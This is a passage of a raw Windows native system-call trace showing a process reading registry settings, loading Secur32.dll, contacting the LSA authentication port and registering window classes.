 01425   748   NtOpenKey  (0x80000000, {24, -2147482740, 0x640, 0, 0,  (0x80000000, {24, -2147482740, 0x640, 0, 0, "Control Panel\Desktop"}, ... -2147481372, ) }, ... -2147481372, ) == 0x0
 01426   748   NtQueryValueKey  (-2147481372,  (-2147481372, "MultiUILanguageId", Partial, 256, ... ) , Partial, 256, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01427   748   NtClose  (-2147481372, ... ) == 0x0
 01428   748   NtClose  (-2147482740, ... ) == 0x0
 01418   748   NtQueryDefaultUILanguage  ... ) == 0x0
 01429   748   NtAllocateVirtualMemory  (-1, 1384448, 0, 4096, 4096, 4, ... 1384448, 4096, ) == 0x0
 01430   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WindowsShell.Manifest"}, 1235556, ... ) }, 1235556, ... ) == 0x0
 01431   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WindowsShell.Manifest"}, 5, 96, ... 92, {status=0x0, info=1}, ) }, 5, 96, ... 92, {status=0x0, info=1}, ) == 0x0
 01432   748   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 92, ... 156, ) == 0x0
 01433   748   NtClose  (92, ... ) == 0x0
 01434   748   NtMapViewOfSection  (156, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0xfe0000), 0x0, 4096, ) == 0x0
 01435   748   NtClose  (156, ... ) == 0x0
 01436   748   NtUnmapViewOfSection  (-1, 0xfe0000, ... ) == 0x0
 01437   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WindowsShell.Manifest"}, 1235152, ... ) }, 1235152, ... ) == 0x0
 01438   748   NtCreateFile  (0x80100080, {24, 0, 0x40, 0, 1235896,  (0x80100080, {24, 0, 0x40, 0, 1235896, "\??\C:\WINDOWS\WindowsShell.Manifest"}, 0x0, 0, 5, 1, 96, 0, 0, ... 156, {status=0x0, info=1}, ) }, 0x0, 0, 5, 1, 96, 0, 0, ... 156, {status=0x0, info=1}, ) == 0x0
 01439   748   NtCreateSection  (0xf0005, 0x0, 0x0, 2, 134217728, 156, ... 92, ) == 0x0
 01440   748   NtClose  (156, ... ) == 0x0
 01441   748   NtMapViewOfSection  (92, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 2, ... (0xfe0000), {0, 0}, 4096, ) == 0x0
 01442   748   NtClose  (92, ... ) == 0x0
 01443   748   NtUnmapViewOfSection  (-1, 0xfe0000, ... ) == 0x0
 01444   748   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WindowsShell.Manifest"}, 1, 96, ... 92, {status=0x0, info=1}, ) }, 1, 96, ... 92, {status=0x0, info=1}, ) == 0x0
 01445   748   NtCreateSection  (0x4, 0x0, 0x0, 2, 134217728, 92, ... 156, ) == 0x0
 01446   748   NtMapViewOfSection  (156, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 2, ... (0xfe0000), 0x0, 4096, ) == 0x0
 01447   748   NtQueryInformationFile  (92, 1235548, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 01448   748   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WindowsShell.Config"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01449   748   NtRequestWaitReplyPort  (24, {128, 156, new_msg, 0, 2088850039, 1235848, 1179817, 1235572}  (24, {128, 156, new_msg, 0, 2088850039, 1235848, 1179817, 1235572} "\210\6\31\1\33\0\1\0`\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\3\0@\0D\0\250\6\31\1\\0\0\0\234\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\355\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\26\0\30\0\354\6\31\1\0\0\0\0\0\0\0\0|\337\22\0\0\0\0\0" ... {128, 156, reply, 0, 484, 748, 58404, 0} "\260d\27\0\33\0\1\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\3\0@\0D\0\250\6\31\1\\0\0\0\234\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\355\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\26\0\30\0\354\6\31\1\0\0\0\0\0\0\0\0|\337\22\0\0\0\0\0" )  ... {128, 156, reply, 0, 484, 748, 58404, 0}  (24, {128, 156, new_msg, 0, 2088850039, 1235848, 1179817, 1235572} "\210\6\31\1\33\0\1\0`\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\3\0@\0D\0\250\6\31\1\\0\0\0\234\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\355\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\26\0\30\0\354\6\31\1\0\0\0\0\0\0\0\0|\337\22\0\0\0\0\0" ... {128, 156, reply, 0, 484, 748, 58404, 0} "\260d\27\0\33\0\1\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\3\0@\0D\0\250\6\31\1\\0\0\0\234\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\355\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\26\0\30\0\354\6\31\1\0\0\0\0\0\0\0\0|\337\22\0\0\0\0\0" )  ) == 0x0
 01450   748   NtClose  (92, ... ) == 0x0
 01451   748   NtClose  (156, ... ) == 0x0
 01452   748   NtUnmapViewOfSection  (-1, 0xfe0000, ... ) == 0x0
 01453   748   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01454   748   NtUserRegisterWindowMessage  ( ("ShellGetDragImage", ... ) , ... ) == 0xc03a
 01455   748   NtUserSystemParametersInfo  (104, 0, 2001084812, 0, ... ) == 0x1
 01456   748   NtUserGetDC  (0, ... ) == 0x1010052
 01457   748   NtUserCallOneParam  (16842834, 57, ... ) == 0x1
 01458   748   NtUserSystemParametersInfo  (38, 4, 2001086940, 0, ... ) == 0x1
 01459   748   NtUserSystemParametersInfo  (66, 12, 1237548, 0, ... ) == 0x1
 01460   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01461   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 156, ) == 0x0
 01462   748   NtQueryInformationToken  (156, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01463   748   NtClose  (156, ... ) == 0x0
 01464   748   NtOpenKey  (0x20019, {24, 0, 0x640, 0, 0,  (0x20019, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... 156, ) }, ... 156, ) == 0x0
 01465   748   NtOpenProcessToken  (-1, 0x8, ... 92, ) == 0x0
 01466   748   NtAccessCheck  (1382048, 92, 0x1, 1237380, 1237432, 56, 1237412, ... ) == STATUS_NO_IMPERSONATION_TOKEN
 01467   748   NtClose  (92, ... ) == 0x0
 01468   748   NtOpenKey  (0x20019, {24, 156, 0x40, 0, 0,  (0x20019, {24, 156, 0x40, 0, 0, "Control Panel\Desktop"}, ... 92, ) }, ... 92, ) == 0x0
 01469   748   NtQueryValueKey  (92,  (92, "SmoothScroll", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01470   748   NtClose  (92, ... ) == 0x0
 01471   748   NtUserSystemParametersInfo  (41, 500, 1237576, 0, ... ) == 0x1
 01472   748   NtOpenProcessToken  (-1, 0x8, ... 92, ) == 0x0
 01473   748   NtAccessCheck  (1382048, 92, 0x1, 1237380, 1237432, 56, 1237412, ... ) == STATUS_NO_IMPERSONATION_TOKEN
 01474   748   NtClose  (92, ... ) == 0x0
 01475   748   NtOpenKey  (0x20019, {24, 156, 0x40, 0, 0,  (0x20019, {24, 156, 0x40, 0, 0, "software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"}, ... 92, ) }, ... 92, ) == 0x0
 01476   748   NtQueryValueKey  (92,  (92, "EnableBalloonTips", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01477   748   NtClose  (92, ... ) == 0x0
 01478   748   NtUserSystemParametersInfo  (27, 0, 2001085788, 0, ... ) == 0x1
 01479   748   NtUserSystemParametersInfo  (102, 0, 2001086828, 0, ... ) == 0x1
 01480   748   NtClose  (156, ... ) == 0x0
 01481   748   NtUserSystemParametersInfo  (4130, 0, 1238080, 0, ... ) == 0x1
 01482   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\LanguagePack"}, ... 156, ) }, ... 156, ) == 0x0
 01483   748   NtEnumerateValueKey  (156, 0, Full, 220, ... ) == STATUS_NO_MORE_ENTRIES
 01484   748   NtClose  (156, ... ) == 0x0
 01485   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01486   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c03b
 01487   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c03d
 01488   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01489   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c03f
 01490   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01491   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c041
 01492   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01493   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c043
 01494   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c045
 01495   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01496   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c047
 01497   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01498   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c049
 01499   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01500   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c04b
 01501   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01502   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c04d
 01503   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01504   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c04f
 01505   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c051
 01506   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01507   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c053
 01508   748   NtUserFindExistingCursorIcon  (1237324, 1237340, 1237388, ... ) == 0x10011
 01509   748   NtUserRegisterClassExWOW  (1237268, 1237336, 1237352, 1237368, 0, 384, 0, ... ) == 0x8174c055
 01510   748   NtUserFindExistingCursorIcon  (1237324, 1237340, 1237388, ... ) == 0x10011
 01511   748   NtUserRegisterClassExWOW  (1237268, 1237336, 1237352, 1237368, 0, 384, 0, ... ) == 0x8174c057
 01512   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01513   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c059
 01514   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10013
 01515   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c05b
 01516   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01517   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c05d
 01518   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01519   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c05f
 01520   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01521   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c017
 01522   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01523   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c019
 01524   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10013
 01525   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c018
 01526   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01527   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c01a
 01528   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01529   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c01c
 01530   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01531   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c01e
 01532   748   NtUserFindExistingCursorIcon  (1237320, 1237336, 1237384, ... ) == 0x10011
 01533   748   NtUserRegisterClassExWOW  (1237320, 1237388, 1237404, 1237420, 0, 384, 0, ... ) == 0x8174c01b
 01534   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01535   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c068
 01536   748   NtUserFindExistingCursorIcon  (1237328, 1237344, 1237392, ... ) == 0x10011
 01537   748   NtUserRegisterClassExWOW  (1237272, 1237340, 1237356, 1237372, 0, 384, 0, ... ) == 0x8174c06a
 01538   748   NtCreateKey  (0x2001f, {24, 56, 0x40, 0, 0,  (0x2001f, {24, 56, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, 0, 0x0, 0, ... 156, 2, ) }, 0, 0x0, 0, ... 156, 2, ) == 0x0
 01539   748   NtSetEventBoostPriority  (148, ...
 01335  1480   NtWaitForSingleObject  ... ) == 0x0
 01540  1480   NtTestAlert  (... ) == 0x0
 01541  1480   NtContinue  (16579888, 1, ...
 01542  1480   NtRegisterThreadTerminatePort  (24, ... ) == 0x0
 01543  1480   NtDeviceIoControlFile  (124, 136, 0x0, 0x77e466a0, 0x228144,  (124, 136, 0x0, 0x77e466a0, 0x228144, "\2\0\0\0\1\0\0\0\\370\342w\0\0\0\0\204\0\0\0\0\0\0\0\220\0\0\0\0\0\0\0x\0\0\0\0\0\0\0", 40, 4096, ... {status=0x103, info=0}, "", ) , 40, 4096, ... {status=0x103, info=0}, "", ) == 0x103
 01539   748   NtSetEventBoostPriority  ... ) == 0x0
 01544   748   NtQueryValueKey  (156,  (156, "FromCacheTimeout", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01545   748   NtQueryValueKey  (156,  (156, "SecureProtocols", Partial, 144, ... TitleIdx=0, Type=4, Data="\240\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (156, "SecureProtocols", Partial, 144, ... TitleIdx=0, Type=4, Data="\240\0\0\0"}, 16, ) }, 16, ) == 0x0
 01546   748   NtOpenKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "Software\Policies"}, ... 92, ) }, ... 92, ) == 0x0
 01547   748   NtOpenKey  (0x20019, {24, 56, 0x40, 0, 0,  (0x20019, {24, 56, 0x40, 0, 0, "Software\Policies"}, ... 160, ) }, ... 160, ) == 0x0
 01548   748   NtOpenKey  (0x20019, {24, 56, 0x40, 0, 0,  (0x20019, {24, 56, 0x40, 0, 0, "Software"}, ... 164, ) }, ... 164, ) == 0x0
 01549   748   NtOpenKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "Software"}, ... }, ...
 01550  1480   NtWaitForMultipleObjects  (2, (128, 136, ), 1, 1, {1294967296, -1}, ... ) == 0x0
 01551  1480   NtDeviceIoControlFile  (124, 140, 0x0, 0x77e46680, 0x228144,  (124, 140, 0x0, 0x77e46680, 0x228144, "\2\0\0\0\1\0\0\0\\370\342w\0\0\0\0\204\0\0\0\0\0\0\0\220\0\0\0\0\0\0\0x\0\0\0\0\0\0\0", 40, 4096, ... {status=0x103, info=0}, "", ) , 40, 4096, ... {status=0x103, info=0}, "", ) == 0x103
 01552  1480   NtWaitForMultipleObjects  (2, (128, 140, ), 1, 1, {1294967296, -1}, ...
 01549   748   NtOpenKey  ... 168, ) == 0x0
 01553   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01554   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01555   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01556   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 172, ) }, ... 172, ) == 0x0
 01557   748   NtQueryValueKey  (172,  (172, "CertificateRevocation", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (172, "CertificateRevocation", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 01558   748   NtClose  (172, ... ) == 0x0
 01559   748   NtQueryValueKey  (156,  (156, "DisableKeepAlive", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01560   748   NtQueryValueKey  (156,  (156, "DisablePassport", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01561   748   NtQueryValueKey  (156,  (156, "IdnEnabled", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01562   748   NtQueryValueKey  (156,  (156, "CacheMode", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01563   748   NtQueryValueKey  (156,  (156, "EnableHttp1_1", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (156, "EnableHttp1_1", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 01564   748   NtQueryValueKey  (156,  (156, "ProxyHttp1.1", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01565   748   NtQueryValueKey  (156,  (156, "EnableNegotiate", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (156, "EnableNegotiate", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 01566   748   NtQueryValueKey  (156,  (156, "DisableBasicOverClearChannel", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01567   748   NtOpenKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01568   748   NtOpenKey  (0x20019, {24, 56, 0x40, 0, 0,  (0x20019, {24, 56, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01569   748   NtOpenKey  (0x20019, {24, 56, 0x40, 0, 0,  (0x20019, {24, 56, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01570   748   NtOpenKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... 172, ) }, ... 172, ) == 0x0
 01571   748   NtQueryValueKey  (172,  (172, "Feature_ClientAuthCertFilter", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01572   748   NtClose  (172, ... ) == 0x0
 01573   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "Secur32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01574   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\Secur32.dll"}, 1239804, ... ) }, 1239804, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01575   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Secur32.dll"}, 1239804, ... ) }, 1239804, ... ) == 0x0
 01576   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Secur32.dll"}, 5, 96, ... 172, {status=0x0, info=1}, ) }, 5, 96, ... 172, {status=0x0, info=1}, ) == 0x0
 01577   748   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 172, ... 176, ) == 0x0
 01578   748   NtQuerySection  (176, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 01579   748   NtClose  (172, ... ) == 0x0
 01580   748   NtMapViewOfSection  (176, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77fe0000), 0x0, 69632, ) == 0x0
 01581   748   NtClose  (176, ... ) == 0x0
 01582   748   NtProtectVirtualMemory  (-1, (0x77fe1000), 388, 4, ... (0x77fe1000), 4096, 32, ) == 0x0
 01583   748   NtProtectVirtualMemory  (-1, (0x77fe1000), 4096, 32, ... (0x77fe1000), 4096, 4, ) == 0x0
 01584   748   NtFlushInstructionCache  (-1, 2013138944, 388, ... ) == 0x0
 01585   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Secur32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01586   748   NtCreateSemaphore  (0x100003, 0x0, 0, 2147483647, ... 176, ) == 0x0
 01587   748   NtCreateSemaphore  (0x100003, 0x0, 0, 2147483647, ... 172, ) == 0x0
 01588   748   NtOpenEvent  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\SECURITY\LSA_AUTHENTICATION_INITIALIZED"}, ... 180, ) }, ... 180, ) == 0x0
 01589   748   NtQueryEvent  (180, Basic, 8, ... {EventType=0,SignalState=1,}, 0x0, ) == 0x0
 01590   748   NtClose  (180, ... ) == 0x0
 01591   748   NtConnectPort  ( ("\LsaAuthenticationPort", {12, 2, 1, 0}, 0x0, 0x0, 1241376, 140, ... 180, 0x0, 0x0, 256, 140, ) , {12, 2, 1, 0}, 0x0, 0x0, 1241376, 140, ... 180, 0x0, 0x0, 256, 140, ) == 0x0
 01592   748   NtRequestWaitReplyPort  (180, {28, 52, new_msg, 0, 0, 0, 0, 0}  (180, {28, 52, new_msg, 0, 0, 0, 0, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\353\6\10\2\220\36\24\0" ... {188, 212, reply, 0, 484, 748, 58559, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\34\0\10\2\220\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0" )  ... {188, 212, reply, 0, 484, 748, 58559, 0}  (180, {28, 52, new_msg, 0, 0, 0, 0, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\353\6\10\2\220\36\24\0" ... {188, 212, reply, 0, 484, 748, 58559, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\34\0\10\2\220\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0" )  ) == 0x0
 01593   748   NtQueryValueKey  (156,  (156, "SyncMode5", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01594   748   NtOpenKey  (0x9, {24, 16, 0x40, 0, 0,  (0x9, {24, 16, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 184, ) }, ... 184, ) == 0x0
 01595   748   NtQueryValueKey  (184,  (184, "SessionStartTimeDefaultDeltaSecs", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01596   748   NtClose  (184, ... ) == 0x0
 01597   748   NtOpenKey  (0xf, {24, 16, 0x40, 0, 0,  (0xf, {24, 16, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 184, ) }, ... 184, ) == 0x0
 01598   748   NtOpenKey  (0xf, {24, 56, 0x40, 0, 0,  (0xf, {24, 56, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 188, ) }, ... 188, ) == 0x0
 01599   748   NtOpenKey  (0x9, {24, 56, 0x40, 0, 0,  (0x9, {24, 56, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 192, ) }, ... 192, ) == 0x0
 01600   748   NtQueryValueKey  (192,  (192, "Signature", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0l\0i\0e\0n\0t\0 \0U\0r\0l\0C\0a\0c\0h\0e\0 \0M\0M\0F\0 \0V\0e\0r\0 \05\0.\02\0\0\0"}, 68, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (192, "Signature", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0l\0i\0e\0n\0t\0 \0U\0r\0l\0C\0a\0c\0h\0e\0 \0M\0M\0F\0 \0V\0e\0r\0 \05\0.\02\0\0\0"}, 68, ) }, 68, ) == 0x0
